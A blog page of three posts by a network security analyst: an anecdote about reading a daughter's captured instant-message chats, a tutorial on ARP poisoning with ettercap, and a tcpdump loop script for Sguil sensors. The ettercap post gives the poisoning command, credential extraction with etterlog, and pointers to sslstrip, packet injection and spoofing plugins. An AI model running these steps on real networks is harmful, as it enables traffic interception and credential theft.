Showing posts with label tcpdump. Show all posts
Showing posts with label tcpdump. Show all posts

04 June, 2012

A Practical Example of Non-technical Indicators and Incident Response

Once upon a time there was a network security analyst slash NSM engineer who, like any sane person, ran full packet capture, IDS/IPS, session capture, and passive fingerprinting inline at the ingress/egress of his home network. His setup was most similar to diagram two in IDS/IPS Placement on Home Network.

This security analyst was casually going about his business one day when he opened the basement door of his house and found a tennis ball wedged between the door frame and the storm door. “That’s odd!” he thought. “Who would do that?”

After removing the tennis ball, he thought, “Well, this storm door is really loud when it closes those last few inches. Maybe someone did it to quietly enter or exit the house.” It just so happens that the daughter of said analyst was in high school and her bedroom was down the hall from the basement door. He promptly entered her room and took a quick look around. Lo and behold, the screen from her window was under her bed and the window itself was unlocked. Since this room was on the ground floor, the analyst immediately had some good ideas about what was happening with the window and the basement door. Someone was sneaking in or out of the house!

The analyst confronted his teenage daughter when she got home from school and received denial after denial about any possible wrongdoing. The denials did not sound sincere.

Enter the network security monitoring. He stated, “I told you I would respect your privacy with your email and other electronic communications unless you gave me a reason not to. I consider you in violation of these Terms of Service and I’m going to see what you’ve been up to lately.”

At this point it was late in the evening and the analyst had to get up early for work. This was some years back when AIM was quite common, so he briefly used Sguil to look at recent sessions of AOL Instant Messenger traffic. He decided to get some sleep for work the next day and put off additional investigation. In the meantime, his daughter's privileges were highly restricted.

A day or two later, after trying to manually sift through some of the ASCII transcripts of the packet captures the analyst quickly decided there was a better way. He whipped up a short shell script to loop through all the packet captures, run Dug Song’s msgsnarf, and pipe the output into an HTML file for later examination. This required a little tweaking to make the HTML easily readable, but it was fairly quick to write and test the script.
The next morning there were many hundreds of lines of AIM conversations to examine. He started working from the most recent and reading backwards. After a few minutes he quickly confirmed that his daughter had been sneaking out of the house to go to parties and get into other mischief.

Another conversation with his daughter finally led to her confession, a long discussion, and suitable punishment. Despite the severity of her actions, the HTML file containing the chat transcripts also contained a few endearing nuggets.

Daughter: OMG they know everything!
Accomplice: what do u mean everything
Daughter: my dad can read all my chats
Daughter: he does computer security for [company redacted]
Daughter: he’s a computer genius
Daughter: DAD I’M INNOCENT!

Upon telling this story to a current colleague, he mentioned that the last few lines are the best father’s day gift the analyst would ever receive.

I think there are a few obvious lessons here that can translate to network monitoring.

First, the initial indicator of the problem was in the physical world. Network security monitoring or any other type of technical monitoring and prevention will fail. I have experienced many times when phone calls from users have been one of the earliest indicators of malicious activity. Particularly in the case of insider threats, it's important to note that many initial indicators of malicious activity are non-technical, like a person's behavior, personnel action, or in this case a physical indicator of a security problem.

Second, sometimes you need to be flexible to solve a problem quickly and with minimal effort. The analyst could have manually looked at the AIM traffic, but because he judged that the threat of another incident was already mitigated by talking to the daughter, digging up the traffic wasn’t urgent. Instead, The analyst decided to write the script that would pull all the traffic and convert it to a readable format. The analyst also had the luxury of knowing that all the packet captures would still be there since his home bandwidth at the time meant well more than 30 days of pcap storage.

Third, network monitoring is a means to an end. In this case, there was a security problem that could be addressed with the help of technical means. In many obvious cases you are trying to protect data. In other cases, you can be trying to protect people or things in the physical world that could be harmed if the wrong information is revealed. It is important to stay focused on what really matters and not get caught worrying about the wrong things because your instrumentation or technologies push you towards priorities that don’t make sense.

Last, attackers are not static. The daughter definitely learned the value of encryption and even using out-of-band communication in the form of SMS over the phone network if she did not want the network sensor recording her conversations in plain text. Technology advancement also makes attackers evolve, for instance with the move to Facebook chat or SMS from older forms of IM.

28 February, 2011

Using ettercap for ARP poisoning

Ettercap is certainly nothing new, and there is plenty of documentation around to see how to use it, but I was sitting here goofing around and decided to record my results. I am not advocating this type of thing on a public network, and ARP poisoning or other attacks often fall afoul of terms of service for public and private networks, and may even be illegal in some jurisdictions.

First, I looked at my default route.

$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
10.71.0.0       0.0.0.0         255.255.255.0   U     2      0        0 wlan0
0.0.0.0         10.71.0.1       0.0.0.0         UG    0      0        0 wlan0


To sniff the whole subnet, I'll want to do some ARP poisoning to send all traffic to/from the default route through my system.

$ sudo ettercap -i wlan0 -T -M arp:remote /10.71.0.1/ //

You can also use "// //" to designate ARP poisoning no matter what source and destination ettercap sees. The "-T" tells ettercap to use the text interface, which is still interactive. There is also a curses-based interface, "-C", and GTK with "-G" though it has always seemed less reliable to me than the others. The curses interface is actually pretty nice.

Once you run the command, ettercap should enumerate hosts and you will start seeing a bunch of traffic information scrolling through your console. How do we know if it's actually working? If you see non-broadcast traffic destined for other hosts, it will be obvious and you will know you're successfully sniffing all the traffic.

Another fun way is by opening etherape to see a realtime visualization of the traffic. If you are seeing typical non-broadcast traffic like HTTP, HTTPS, that's an indicator that you're successfully ARP poisoning. You can also get a quick idea if there are particular hosts getting a lot of traffic activity. I've seen the typical sites like Facebook, Amazon, Akamai, and LLNW, but also more interesting sites that are easily identifiable as VPN concentrators, banks, and more.

You can also of course use various tools including ettercap with the "-w" option to write traffic to a file and review at my leisure to look for interesting data. Ettercap also has an interesting utility to automatically grab usernames and passwords. From the man page:

       -L, --log
              Log  all  the packets to binary files. These files can be parsed
              by etterlog(8) to extract human readable data. With this option,
              all  packets  sniffed  by ettercap will be logged, together with
              all the passive info (host info + user & pass) it  can  collect.
              Given  a LOGFILE, ettercap will create LOGFILE.ecp (for packets)
              and LOGFILE.eci (for the infos).


If you didn't run this with ettercap originally, you can also run it on a saved packet capture.

$ ettercap -r hotel.raw -L hotel

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Please select an User Interface

$ ls hotel*
hotel.eci  hotel.ecp  hotel.raw

$ etterlog -a hotel.eci

etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Log file version    : NG-0.7.3
Timestamp           : Wed Feb 16 14:20:57 2010
Type                : LOG_INFO

Number of hosts (total)       : 248

Number of local hosts         : 30
Number of non local hosts     : 0
Number of gateway             : 0

Number of discovered services : 240
Number of accounts captured   : 4

$ etterlog -p hotel.eci

74.125.93.191   TCP 80     USER: fakeuser      PASS: fakepasswd

I changed the data above and of course most sites these days are hopefully forcing encrypted logins.

These days, many sites can be hosted on one IP or virtual server. If you're not catching the DNS or HTTP request specifically before the login that was captured, the easiest way to determine which site on a specific IP was being visited would be opening up the packet capture with a tool like Wireshark, using a filter for the IP, then looking at the actual web traffic for the site's name. Looking in Wireshark, I can see the GET immediately after the TCP handshake.

GET /members/bbs/showthread.php HTTP/1.1
Host: www.fakedomain.com

This really just scratches the surface of what you can do with ettercap and other network tools. ARP poisoning still works, particularly on public networks, and many people log in to many services that can be easily compromised through sniffing (I write while sitting in an airport on public WiFi logged into my blogger account). A relatively recent high profile example was when the Metasploit site was briefly hijacked by successful ARP poisoning.

There are numerous other attacks besides sniffing that could succeed when ARP poisoning, many involving redirecting traffic or injecting malicious content. For instance, you can use something like sslstrip to redirect all HTTPS traffic to HTTP, grabbing credentials in the process. You could also inject content directly using etterfilter.

 DESCRIPTION
       The etterfilter utility is used to compile  source  filter  files  into
       binary  filter  files that can be interpreted by the JIT interpreter in
       the ettercap(8) filter engine. You have to compile your filter  scripts
       in  order  to  use  them  in  ettercap. All syntax/parse errors will be
       checked at compile time, so you will  be  sure  to  produce  a  correct
       binary filter for ettercap.
Using etterfilter you can inject new packets, replace data in packets, and more. If someone is visiting what they consider a known safe site, replacing data or injecting malicious packets can be quite successful. At a previous job, we had a non-production network for attack and defend fun, and with etterfilter I was able to replace all image requests by one of my colleagues' browser and instead have it request the image to the left.

Although my example above is obviously on a wireless network as shown by using the wlan0 interface, you can easily perform ARP poisoning on a local wired segment. There are also a number of ways to help detect or prevent poisoning with your network appliances or software.

Finally, ettercap also has a number of interesting plugins available.
$ ettercap -P list

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA


Available plugins :

         arp_cop  1.1  Report suspicious ARP activity
         autoadd  1.2  Automatically add new victims in the target range
      chk_poison  1.1  Check if the poisoning had success
       dns_spoof  1.1  Sends spoofed dns replies
      dos_attack  1.0  Run a d.o.s. attack against an IP address
           dummy  3.0  A plugin template (for developers)
       find_conn  1.0  Search connections on a switched LAN
   find_ettercap  2.0  Try to find ettercap activity
         find_ip  1.0  Search an unused IP address in the subnet
          finger  1.6  Fingerprint a remote host
   finger_submit  1.0  Submit a fingerprint to ettercap's website
       gre_relay  1.0  Tunnel broker for redirected GRE tunnels
     gw_discover  1.0  Try to find the LAN gateway
         isolate  1.0  Isolate an host from the lan
       link_type  1.0  Check the link type (hub/switch)
    pptp_chapms1  1.0  PPTP: Forces chapms-v1 from chapms-v2
      pptp_clear  1.0  PPTP: Tries to force cleartext tunnel
        pptp_pap  1.0  PPTP: Forces PAP authentication
      pptp_reneg  1.0  PPTP: Forces tunnel re-negotiation
      rand_flood  1.0  Flood the LAN with random MAC addresses
  remote_browser  1.2  Sends visited URLs to the browser
       reply_arp  1.0  Simple arp responder
    repoison_arp  1.0  Repoison after broadcast ARP
   scan_poisoner  1.0  Actively search other poisoners
  search_promisc  1.2  Search promisc NICs in the LAN
       smb_clear  1.0  Tries to force SMB cleartext auth
        smb_down  1.0  Tries to force SMB to not use NTLM2 key auth
     stp_mangler  1.0  Become root of a switches spanning tree

30 November, 2007

A "for" loop with tcpdump

This is the kind of post to which most people with Linux or Unix experience will say "Duh!", or even offer better ways to do what I'm doing. It's just a short shell script I use to loop through all the packet capture files on a Sguil sensor looking for specific host(s) and/or port(s). Sometimes it is easier to run a script like this and then SCP the files from the sensor to a local system instead of querying and opening the packet captures one by one using the Sguil client. This also allows more leisurely analysis without worrying about the log_packets script deleting any of the data I want to see.

Nigel Houghton mentioned that any shell script of more than 10 or 20 lines should be rewritten in Perl. Despite his advice, I do plan to switch some of my shell scripts to Perl when I get the chance. ;)

The sensorname variable works for me because my sensor uses the hostname as the sensor name. If my sensor name didn't match the actual hostname or I had multiple sensors on one host then I would have to change the variable.

The BPF expression can be changed as needed. Maybe a better way would be to set it to a command line argument so you don't have to edit the file every time you run the script. The following example uses a Google IP address and port 80 for the BPF. I most often use this script to simply grab all traffic associated with one or more IP addresses.

It may also be worth noting that I run the script as a user that has permissions to the packet captures.

#!/bin/sh

sensorname="`hostname`"
bpfexpression="host 64.233.167.99 and port 80"
outdir=/home/nr/scriptdump

if [ ! -d $outdir]; then
mkdir $outdir
fi

# For each dir in the dailylogs dir
for i in $( ls /nsm/$sensorname/dailylogs/ ); do
# For each file in dailylogs/$i dir
for j in $( ls /nsm/$sensorname/dailylogs/$i ); do
# Run tcpdump and look for the host
tcpdump -r /nsm/$sensorname/dailylogs/$i/$j -w $outdir/$j.pcap $bpfexpression
done
done

# For each pcap
cd $outdir
for file in $( ls *.pcap ); do
# If file has size of 24, it has no data so rm file
if [ "`ls -l $file | awk '{print $5}'`" = "24" ]; then
rm -f "$file"
fi
done
One of the things I like about posting even a simple script like this is that it makes me really think about how it could be improved. For instance, it might be nice to add a variable for the write directory so it is easier to change where the output files go.

Also, in Sguil the full content packet captures use the Unix time in the file names. If you ever had a copy of the file where the timestamp wasn't preserved, you could still find it by looking at the epoch time in the file name. For instance, with a file named "snort.log.1194141602", the following would convert the epoch time to local time:
$ date -d @1194141602
Sat Nov 3 22:00:02 EDT 2007